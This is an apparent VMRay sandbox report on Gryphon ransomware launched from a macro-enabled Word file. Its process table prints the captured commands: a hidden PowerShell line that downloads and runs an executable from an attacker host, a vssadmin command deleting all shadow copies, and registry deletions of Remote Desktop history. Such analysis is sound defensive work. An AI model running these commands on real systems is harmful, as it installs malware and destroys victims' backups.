Gryphon Ransomware Analysis | VMRay Analyzer Report
Try VMRay Analyzer
| Creation Time | 2017-09-07 18:14 (UTC+2) |
| VM Analysis Duration Time | 00:15:25 |
| Execution Successful |
|
| Sample Filename | 69234490.doc |
| Command Line Parameters |
|
| Prescript |
|
| Number of Processes | 10 |
| Termination Reason | Timeout |
| Download | Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON |
|
VTI Score
100 / 100
|
|
| VTI Database Version | 2.6 |
| VTI Rule Match Count | 2124 |
| VTI Rule Type | Documents |
|
The operating system was rebooted during the analysis. |
|
|
The maximum number of extracted files was reached during the analysis. Some files may be missing in the reports. You can increase the limit in the configuration. |
|
|
The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration. |
| ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID |
|---|---|---|---|---|---|---|
| #1 | 0x908 | Analysis Target | Medium | winword.exe | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" | |
| #2 | 0xbb0 | Child Process | Medium | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $nJThd = new-object System.Net.WebClient;$kNpOYqxzAkL = new-object random;$str = 'http://test.top/admin.php?f=2 ,http://test.top/admin.php?f=2 ' -replace 'test', 'weekendfakc'; $kCeRq = $str.Split(',');$name = $kNpOYqxzAkL.next(1, 65536);$CQxUPWselP = $env:temp + '' + $name + '.exe';foreach($dOpZTR in $kCeRq){try{$nJThd.DownloadFile($dOpZTR.ToString(), $CQxUPWselP);Start-Process $CQxUPWselP;break;}catch{write-host $_.Exception.Message;}} | #1 |
| #3 | 0x868 | Child Process | Medium | temp13684.exe | "C:\Users\YBZ8BT~1\AppData\Local\Temp13684.exe" | #2 |
| #4 | 0x670 | Autostart | Medium | temp13684.exe | "C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Temp13684.exe" | |
| #5 | 0x30c | Child Process | Medium | cmd.exe | cmd /c C:\Users\YBZ8BT~1\AppData\Local\Temp\tmp81BC.tmp.bat | #4 |
| #6 | 0x480 | Child Process | Medium | vssadmin.exe | vssadmin.exe Delete Shadows /All /Quiet | #5 |
| #7 | 0x77c | Child Process | Medium | reg.exe | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f | #5 |
| #8 | 0x764 | Child Process | Medium | reg.exe | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f | #5 |
| #9 | 0x78c | Child Process | Medium | reg.exe | reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" | #5 |
| #10 | 0x648 | Child Process | Medium | attrib.exe | attrib Default.rdp -s -h | #5 |
| ID | #17650 |
| MD5 Hash Value | 5975014ccde7296da4989a01e1471e92 |
| SHA1 Hash Value | 499a74573cf6aaa8e79c05d1b6d59dbbfb7402e1 |
| SHA256 Hash Value | fec85bce338245403956637218c76db743748306c89f7ee7830af65ad17f62db |
| Filename | 69234490.doc |
| File Size | 74.06 KB (75837 bytes) |
| File Type | Word Document |
| Has VBA Macros |
|
| Analyzer Version | 2.2.0 |
| Analyzer Build Date | 2017-08-21 12:23 |
| Microsoft Office Version | 2010 |
| Microsoft Word Version | 14.0.4762.1000 |
| Internet Explorer Version | 8.0.7601.17514 |
| Chrome Version | 59.0.3071.109 |
| Firefox Version | 25.0 |
| Flash Version | 10.3.183.86 |
| Java Version | 7.0.600 |
| VM Name | win7_64_sp1-mso2010 |
| VM Architecture | x86 64-bit |
| VM OS | Windows 7 |
| VM Kernel Version | 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) |
